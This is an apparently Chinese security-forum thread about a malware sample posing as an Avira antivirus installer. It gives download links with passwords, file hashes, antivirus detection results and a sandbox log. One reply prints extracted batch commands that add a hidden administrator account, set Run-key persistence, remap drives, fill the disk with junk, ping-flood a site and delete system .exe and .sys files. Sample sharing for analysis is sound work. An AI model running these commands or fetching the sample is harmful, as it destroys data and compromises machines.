【恶意文件】伪小红伞安装

安全守护者

谁试试在虚拟机里运行会不会拦截。我实机不敢双击
运行密码：123456【用于逃避下载查杀】
链接: https://pan.baidu.com/s/1ejkDEu 密码: f3r8




温馨提示：样本危险，谨慎操作。造成后果，概不负责！

EXE:


文件名称：avira_zhcn_av_5a50c89d79a90__ws.exe
文件大小：3591168 字节
修改时间：2018年1月13日 09:48:03
MD5     ：8ED0821C1F25237C798C9E547E4D4F19
SHA1    ：D2382A1165B52AAB6D8F69089BC94B3BA8D70605
CRC32   ：63E6ACD8

dongwenqi

卡巴miss

安全守护者

dongwenqi 发表于 2018-1-13 10:02
卡巴miss

Kaspersky

非恶意

dongwenqi

安全守护者 发表于 2018-1-13 10:11
Kaspersky

非恶意

之前上报了

安全守护者

dongwenqi 发表于 2018-1-13 10:12
之前上报了

感谢

BE_HC

沙箱环境----
衍生物（密码123）：https://pan.lanzou.com/i0d58ij----
诺顿（Norton）主防杀
文件名: avira_zhcn_av_5a50c89d79a90__ws.exe
威胁名称: SONAR.Heuristic.170
完整路径: c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe
____________________________
来源: 外部介质
源文件:
avira_zhcn_av_5a50c89d79a90__ws.exe
___________________________
系统设置操作
事件: 进程启动 (执行者 c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe, PID:1412) 未尝试修复
c:\Users\administrator\AppData\Local\Temp\ 9C4E.tmp (执行者 c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe, PID:1412) 未尝试修复
c:\Users\administrator\AppData\Local\Temp\9C4E.tmp\ 9C4F.tmp (执行者 c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe, PID:1412) 未尝试修复
c:\Users\administrator\AppData\Local\Temp\9C4E.tmp\9C4F.tmp\ 9C50.bat (执行者 c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe, PID:1412) 未尝试修复
事件: PE 文件创建: c:\Users\administrator\documents\ WannaCry.exe (执行者 c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe, PID:1412) 未尝试修复

----
内存提取字符串（cmd.exe）

1. [ANSI] 0x00026640: tracert bbs.huorong.cn
   
2. [ANSI] 0x00026659: racert www.xyyao.com
   
3. [ANSI] 0x0002666f: tracert bbs.kafan.cn
   
4. [ANSI] 0x00026685: tracert www.bayuxuexiao.com
   
5. [ANSI] 0x000266a2: tracert www.bayuxuexiao.net
   
6. [ANSI] 0x000266bf: net user %username% %username%
   
7. [ANSI] 0x000266e5: net user %username%%username%%username%    /add
   
8. [ANSI] 0x00026716: net localgroup Administrators %username%%username%%username%    /add
   
9. [ANSI] 0x0002675c: net user %username%%username%%username%    /active:yes
   
10. [ANSI] 0x00026794: shutdown -r -t 3
    
11. [ANSI] 0x000267f9: \a.bat
    
12. [ANSI] 0x00026801: copy %0 c:\autoexec.bat
    
13. [ANSI] 0x0002681a: REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
    
14. [ANSI] 0x00026894: REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
    
15. [ANSI] 0x00026c3d: set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
    
16. [ANSI] 0x00026c74: for %%a in (%a%) do subst %%a: d:\fly >nul 2>nul
    
17. [ANSI] 0x00026fb0: set p=%~ps0
    
18. [ANSI] 0x00026fd7: del %~fs0
    
19. [ANSI] 0x00027001: goto x
    
20. [ANSI] 0x00027009: set a=0
    
21. [ANSI] 0x00027017: set /a a=%a%+1
    
22. [ANSI] 0x00027027: echo laji >C:\%a%.txt
    
23. [ANSI] 0x0002703e: goto 22
    
24. [ANSI] 0x00027047: start Speed.bat
    
25. [ANSI] 0x00027058: ping www.bayuxuexiao.com -l 65500 -t
    
26. [ANSI] 0x000270a0: del /f /s /q %systemdrive%\*.exe
    
27. [ANSI] 0x000270c3: del /f /s /q %systemdrive%\*.sys
    
28. *[ANSI] 0x000270e6: TASKKILL /f /IM explorer.exe
    

复制代码

安全守护者

BE_HC 发表于 2018-1-13 10:21
沙箱环境
内存提取字符串（cmd.exe）

有没有什么报毒的

BE_HC

安全守护者 发表于 2018-1-13 10:25
有没有什么报毒的

衍生物我从虚拟机拖出来趋势报了

dongwenqi

安全守护者 发表于 2018-1-13 10:25
有没有什么报毒的

这个卡巴报了

桑德尔

ESET杀
下次请加个密码